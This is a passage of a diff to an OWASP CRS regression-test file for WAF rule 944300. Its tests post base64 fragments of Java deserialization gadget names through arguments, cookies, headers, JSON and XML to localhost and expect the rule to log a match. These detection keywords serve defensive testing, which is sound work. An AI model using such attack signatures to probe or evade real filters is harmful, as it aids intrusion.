"OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id 
\"944300\"" + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 
307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
